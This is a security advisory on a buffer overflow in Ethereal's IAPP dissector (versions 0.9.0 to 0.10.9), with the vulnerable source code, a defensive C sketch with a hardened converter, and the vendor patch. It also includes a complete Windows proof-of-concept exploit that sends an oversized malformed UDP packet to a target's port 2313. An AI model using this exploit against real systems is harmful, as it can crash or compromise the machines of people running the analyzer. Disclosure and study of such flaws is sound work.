Affected systems:
Ethereal Group Ethereal 0.9.9
Ethereal Group Ethereal 0.9.8
Ethereal Group Ethereal 0.9.7
Ethereal Group Ethereal 0.9.6
Ethereal Group Ethereal 0.9.5
Ethereal Group Ethereal 0.9.4
Ethereal Group Ethereal 0.9.3
Ethereal Group Ethereal 0.9.2
Ethereal Group Ethereal 0.9.16
Ethereal Group Ethereal 0.9.15
Ethereal Group Ethereal 0.9.14
Ethereal Group Ethereal 0.9.13
Ethereal Group Ethereal 0.9.12
Ethereal Group Ethereal 0.9.11
Ethereal Group Ethereal 0.9.10
Ethereal Group Ethereal 0.9.1
Ethereal Group Ethereal 0.9.0
Ethereal Group Ethereal 0.10.9
Ethereal Group Ethereal 0.10.8
Ethereal Group Ethereal 0.10.7
Ethereal Group Ethereal 0.10.6
Ethereal Group Ethereal 0.10.5
Ethereal Group Ethereal 0.10.4
Ethereal Group Ethereal 0.10.3
Ethereal Group Ethereal 0.10.2
Ethereal Group Ethereal 0.10.1
Ethereal Group Ethereal 0.10
Unaffected systems:
Ethereal Group Ethereal 0.10.10
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 12762
Ethereal is a network protocol analyzer used by many network professionals to examine how a network is behaving; it supports almost every protocol.
Ethereal's IAPP dissector contains a buffer overflow. A length value taken straight from the network packet is used to fill a static buffer. The length is computed in dissect_pdus() from two guint8 fields: the first is shifted left by 8 bits and the second is added, so the value can reach 65535, and it is never compared against the size of the destination buffer. The loops in pduval_to_str() that consume this length can then overflow the static buffer textbuffer[2000]. In the IAPP_PDU_MSADDR case each input byte produces up to three output characters, so a length of 667 or more is already enough to run past the end of the buffer.
packet-iapp.c
-------------
static void
dissect_pdus(tvbuff_t *tvb, int offset, proto_tree *pdutree, int pdulen)
{
...
int len;
...
/* copy the 3-byte PDU header (type, len_h, len_l) out of the packet */
tvb_memcpy(tvb, (guint8 *)&pduhdr, offset, sizeof(e_pduhdr));
/* attacker-controlled 16-bit length, 0..65535, never checked against the buffer size */
len = (((int)pduhdr.pdu_len_h) << 8) + pduhdr.pdu_len_l;
...
}
-------------
An example of the vulnerable loop in packet-iapp.c:
-----------------
pduval_to_str(int type, int len, tvbuff_t *tvb, int offset)
{
...
case IAPP_PDU_MSADDR:
/* len comes straight from the packet; run points into the static textbuffer[2000] */
mac = tvb_get_ptr(tvb, offset + 3, len);
/* each iteration appends up to three characters ("xx" plus a ':'), so about 3*len bytes land in textbuffer */
for (z = 0; z < len; z++)
run += sprintf(run, "%s%02x", z ? ":" : "", mac[z]);
break;
...
}
----------------
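The length computation and the MSADDR loop above, reduced to a runnable C sketch. This is an added example written for this page, not code from the advisory or from Ethereal's packet-iapp.c: it derives the PDU length the way dissect_pdus() does, works out how many bytes the original sprintf loop would write into textbuffer[2000], and beside it gives a bounded converter that checks the length against both the bytes actually present in the packet and the output buffer. The two struct layouts follow the advisory; the function names msaddr_bytes_written, msaddr_overflows_textbuffer, msaddr_to_str_safe and build_poc_packet and both sample packets are constructed for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IAPP_PDU_MSADDR 3
#define TEXTBUFFER_SIZE 2000   /* size of the static textbuffer in the vulnerable dissector */

/* Header layouts as shown in the advisory (byte-sized fields, no padding). */
typedef struct { uint8_t ia_version; uint8_t ia_type; } e_iapphdr;
typedef struct { uint8_t pdu_type; uint8_t pdu_len_h; uint8_t pdu_len_l; } e_pduhdr;

/* Length exactly as dissect_pdus() derives it: two bytes, big-endian, so 0..65535. */
int iapp_pdu_len(const e_pduhdr *h)
{
    return (((int)h->pdu_len_h) << 8) + h->pdu_len_l;
}

/* Bytes the original MSADDR sprintf loop writes, including the terminating NUL:
 * two hex digits per byte plus one ':' between bytes, i.e. (3*len - 1) + 1. */
size_t msaddr_bytes_written(int len)
{
    if (len <= 0)
        return 1;                  /* loop body never runs; only the NUL is written */
    return (size_t)len * 3;
}

/* 1 if a PDU of this length overflows textbuffer[2000] in the original code. */
int msaddr_overflows_textbuffer(int len)
{
    return msaddr_bytes_written(len) > TEXTBUFFER_SIZE;
}

/* Hardened replacement (hypothetical name, not Ethereal's code): refuses a length
 * that exceeds the bytes actually present after the 3-byte PDU header at `offset`,
 * and never writes past out_sz. Returns characters written (without NUL) or -1. */
int msaddr_to_str_safe(const uint8_t *pkt, size_t pkt_len, size_t offset, int len,
                       char *out, size_t out_sz)
{
    if (out_sz == 0)
        return -1;
    out[0] = '\0';
    if (len < 0 || offset + 3 > pkt_len || (size_t)len > pkt_len - offset - 3)
        return -1;                 /* length field claims more than the packet carries */
    if (msaddr_bytes_written(len) > out_sz)
        return -1;                 /* would not fit: reject rather than truncate silently */
    const uint8_t *mac = pkt + offset + 3;
    size_t used = 0;
    for (int z = 0; z < len; z++) {
        int n = snprintf(out + used, out_sz - used, "%s%02x", z ? ":" : "", mac[z]);
        if (n < 0 || (size_t)n >= out_sz - used)
            return -1;
        used += (size_t)n;
    }
    return (int)used;
}

/* Constructed sample packet (not captured traffic): a well-formed 6-byte MSADDR PDU. */
static const uint8_t benign_pkt[] = {
    1, 1,                          /* e_iapphdr: version 1, type 1 */
    IAPP_PDU_MSADDR, 0x00, 0x06,   /* e_pduhdr: MSADDR, len = 6 */
    0x00, 0x11, 0x22, 0x33, 0x44, 0x55
};

/* Builds a datagram with the header bytes the PoC below uses (len = 0x05a1 = 1441)
 * followed by 0xfc filler, 1489 bytes in total; returns the length or 0 if buf is too small. */
size_t build_poc_packet(uint8_t *buf, size_t sz)
{
    const uint8_t hdr[] = { 1, 1, IAPP_PDU_MSADDR, 0x05, 0xa1 };
    if (sz < 1489)
        return 0;
    memcpy(buf, hdr, sizeof hdr);
    memset(buf + sizeof hdr, 0xfc, 1489 - sizeof hdr);
    return 1489;
}

int main(void)
{
    char out[TEXTBUFFER_SIZE];
    uint8_t pkt[2000];
    int len = iapp_pdu_len((const e_pduhdr *)(benign_pkt + sizeof(e_iapphdr)));
    int n = msaddr_to_str_safe(benign_pkt, sizeof benign_pkt, sizeof(e_iapphdr), len, out, sizeof out);
    printf("benign:  len=%d -> \"%s\" (%d chars)\n", len, out, n);

    size_t plen = build_poc_packet(pkt, sizeof pkt);
    len = iapp_pdu_len((const e_pduhdr *)(pkt + sizeof(e_iapphdr)));
    printf("hostile: len=%d, original loop writes %zu bytes into textbuffer[%d], overflow=%d\n",
           len, msaddr_bytes_written(len), TEXTBUFFER_SIZE, msaddr_overflows_textbuffer(len));
    n = msaddr_to_str_safe(pkt, plen, sizeof(e_iapphdr), len, out, sizeof out);
    printf("hostile: hardened converter returned %d\n", n);
    return 0;
}
```

Build with `cc -std=c99 iapp_len.c`. The PoC's length of 1441 makes the original loop emit 4323 bytes into a 2000-byte buffer; the hardened converter rejects it before the first write. Note the two separate checks: the first catches a length larger than the packet (which would otherwise read past the datagram), the second catches a length whose textual form does not fit the output buffer, which is the bug the advisory describes. The largest MSADDR length the static buffer tolerates is 666 (666 * 3 = 1998 bytes including the NUL).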
Whether remote code execution is possible depends on what surrounds the overflowed buffer; it may be feasible but has not been confirmed.
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Users act at their own risk!
["eth2.c" (text/plain)]
/*
 *
 * Ethereal IAPP remote buffer overflow #2 PoC exploit
 * ---------------------------------------------------
 * To test this vulnerability on windows, try to send 3-10 packets
 * that will trigger the crash, and scroll between captured packets
 * in Ethereal.
 *
 * Coded by Leon Juranic <ljuranic@lss.hr>
 * LSS Security <http://security.lss.hr/en/>
 *
 */
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <string.h>
#pragma comment (lib,"ws2_32")
#define IAPP_PDU_SSID 0
/* IAPP header: one byte version, one byte message type */
typedef struct _e_iapphdr {
    unsigned char ia_version;
    unsigned char ia_type;
} e_iapphdr;
/* PDU header: type plus a 16-bit big-endian length split across two bytes */
typedef struct _e_pduhdr {
    unsigned char pdu_type;
    unsigned char pdu_len_h;
    unsigned char pdu_len_l;
} e_pduhdr;
void xp_sendpacket (char *pack)
{
    WORD wVersionRequested;
    WSADATA wsaData;
    int err;
    int sock,i;
    struct sockaddr_in sin;
    unsigned char buf[2000];
    char bla[2000];
    e_iapphdr *iapp;
    e_pduhdr *pdu;
    wVersionRequested = MAKEWORD( 2, 2 );
    err = WSAStartup( wVersionRequested, &wsaData );
    if ( err != 0 ) {
        printf ("error!!! ");
        ExitProcess(-1);
    }
    /* IAPP is carried over UDP port 2313 */
    sock=socket(AF_INET,SOCK_DGRAM,0);
    sin.sin_family=AF_INET;
    sin.sin_addr.s_addr = inet_addr(pack);
    sin.sin_port = htons(2313);
    iapp = (e_iapphdr*)&buf;
    iapp->ia_version = 1;
    iapp->ia_type = 1;
    /* PDU type 3 (IAPP_PDU_MSADDR) with length 0x05a1 = 1441: the dissector's
     * sprintf loop then writes about 3*1441 bytes into textbuffer[2000] */
    pdu = (e_pduhdr*)(buf+2);
    pdu->pdu_type = 3;
    pdu->pdu_len_h = 0x05;
    pdu->pdu_len_l = 0xa1;
    memset (bla,0,sizeof(bla));
    memset (bla,'\xfc',1300);
    /* filler after the two headers; copy is bounded so the local buf cannot itself overflow */
    strncpy ((char*)buf+sizeof(e_iapphdr)+sizeof(e_pduhdr),bla,sizeof(buf)-sizeof(e_iapphdr)-sizeof(e_pduhdr));
    // for (i=0;i<1000;i++)
    sendto (sock,(char*)buf,1489,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));
}
int main (int argc, char **argv)
{
    if (argc < 2) {
        printf ("usage: %s <target ip>\n", argv[0]);
        return 1;
    }
    xp_sendpacket(argv[1]);
    return 0;
}
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
Ethereal Group
--------------
The vendor has released an upgraded version that fixes this issue. Download Ethereal 0.10.10 from the vendor's home page:
http://www.ethereal.com/class/download.html